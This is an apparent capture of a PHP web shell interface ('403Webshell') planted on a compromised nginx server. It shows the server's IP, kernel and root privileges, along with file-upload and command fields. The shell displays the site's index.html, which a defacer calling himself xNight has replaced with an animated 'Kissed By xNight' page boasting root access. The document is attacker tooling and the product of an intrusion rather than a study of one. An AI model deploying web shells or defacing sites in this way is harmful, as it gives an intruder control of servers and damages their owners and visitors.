403Webshell
Server IP : 43.129.54.214  /  Your IP : 216.73.216.51
Web Server : nginx/1.24.0
System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/default/index.html
<!DOCTYPE html>
<html>
<head>
<title>Kissed By xNight</title>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="JustForFun">
<meta name="keywords" content="Hacked By xNight"/>
<meta name="author" content="xNightR00t"/>
<meta name="robots" content="all" />
<meta name="googlebot" content="all"/>
<meta name="googlebot-news" content="all" />
<meta name="google" content="notranslate"/>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<meta name="theme-color" content="black">
<meta property="og:title" content="Kissed By xNight"/>
<meta property="og:type" content="website" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
    
                @keyframes blink{0%,100%{opacity:1}50%{opacity:0}}
                @keyframes shake{0%,100%{transform:translate(1px,1px) rotate(0deg)}10%{transform:translate(-1px,-2px) rotate(-1deg)}20%{transform:translate(-3px,0px) rotate(1deg)}30%{transform:translate(3px,2px) rotate(0deg)}40%{transform:translate(1px,-1px) rotate(1deg)}50%{transform:translate(-1px,2px) rotate(-1deg)}60%{transform:translate(-3px,1px) rotate(0deg)}70%{transform:translate(3px,1px) rotate(-1deg)}80%{transform:translate(-1px,-1px) rotate(1deg)}90%{transform:translate(1px,2px) rotate(0deg)}}
                @keyframes rainbow{0%{background-position:0%}100%{background-position:400%}}
                @keyframes fall{to{transform:translateY(110vh) translateX(20px)}}
                @keyframes fallStraight{to{transform:translateY(110vh)}}
                @keyframes zoomIn{from{transform:scale(0.8);opacity:0}to{transform:scale(1);opacity:1}}
                @keyframes fadeUp{from{transform:translateY(50px);opacity:0}to{transform:translateY(0);opacity:1}}
                @keyframes dropDown{from{transform:translateY(-100vh)}to{transform:translateY(0)}}
                @keyframes ripple{to{transform:scale(4);opacity:0}}
                .typing-cursor::after {content:'|';animation:blink 1s infinite;}
                .social-links a { color: #ff0000; font-size: 24px; margin: 0 10px; transition: 0.3s; text-decoration: none; }
                .social-links a:hover { text-shadow: 0 0 10px #ff0000; transform: scale(1.2); display: inline-block; }
            
    * { margin:0; padding:0; box-sizing:border-box; }
    body { height:100vh; display:flex; flex-direction:column; align-items:center; justify-content:center; text-align:center; background:#050505; color:#ffffff; font-family:'Courier New',monospace; overflow:hidden; }
    .box { background:transparent;max-width:900px;width:95%; position:relative; z-index:10; display:flex;flex-direction:column; align-items:center; animation: zoomIn 1s cubic-bezier(0.175, 0.885, 0.32, 1.275); }
    h1 { margin:0 0 15px 0; font-size:26px; color:#ff0000; font-weight:900; text-shadow:2px 2px 0 #000,4px 4px 0 #222;  text-transform:uppercase; line-height:1.2; letter-spacing:2px; }
    .msg { font-size:17px; color:#a8b3cf; max-width:90%; margin:0 auto; line-height:1.6; }
    img.main-img { max-width:180px; border-radius:50%; margin:0 auto 25px; border:3px solid #ff0000; box-shadow:0 0 30px #ff0000; object-fit:cover; aspect-ratio:1/1; }
    video.bg-vid { position:fixed; top:0; left:0; width:100%; height:100%; object-fit:cover; z-index:-2; opacity:0.6; filter:contrast(1.2); }
    .ft { margin-top:10px; font-size:12px; opacity:0.6; color:#fff; letter-spacing:1px; }
</style>
</head>
<body>
    <div class="box">
        
        <h1 id="h1_el" class="typing-cursor"></h1>
        <div class="msg">root@xNight: id<br>uid=0(root) gid=0(root) groups=0(root)</div>
        
        <div class="ft"></div>
    </div>
    <script>
                window.onload = function() {
                    let i = 0; let el = document.getElementById('h1_el'); el.innerHTML = '';
                    function type() { if (i < "#JustForFun".length) { el.innerHTML += "#JustForFun".charAt(i); i++; setTimeout(type, 80); } } type();
                };
                </script><script>
                document.addEventListener('click', function(e) {
                    let fx = document.createElement('div');
                    fx.style.position = 'fixed'; fx.style.left = (e.clientX-10) + 'px'; fx.style.top = (e.clientY-10) + 'px';
                    fx.style.width = '20px'; fx.style.height = '20px'; fx.style.borderRadius = '50%';
                    fx.style.pointerEvents = 'none'; fx.style.zIndex = '9999';
                    fx.style.background = '#ff0000'; fx.style.boxShadow = '0 0 20px #ff0000'; fx.style.animation = 'ripple 0.4s ease-out';
                    document.body.appendChild(fx); setTimeout(()=>fx.remove(), 600);
                });
                </script><script>setInterval(()=>{const e=document.createElement('div');e.style.cssText='position:fixed;width:4px;height:4px;background:#ffaa00;box-shadow:0 0 10px #ffaa00;border-radius:50%;left:'+Math.random()*100+'vw;top:-10px;animation:fall '+(Math.random()*5+4)+'s ease-in-out;z-index:1';document.body.appendChild(e);setTimeout(()=>e.remove(),9000);},300);</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit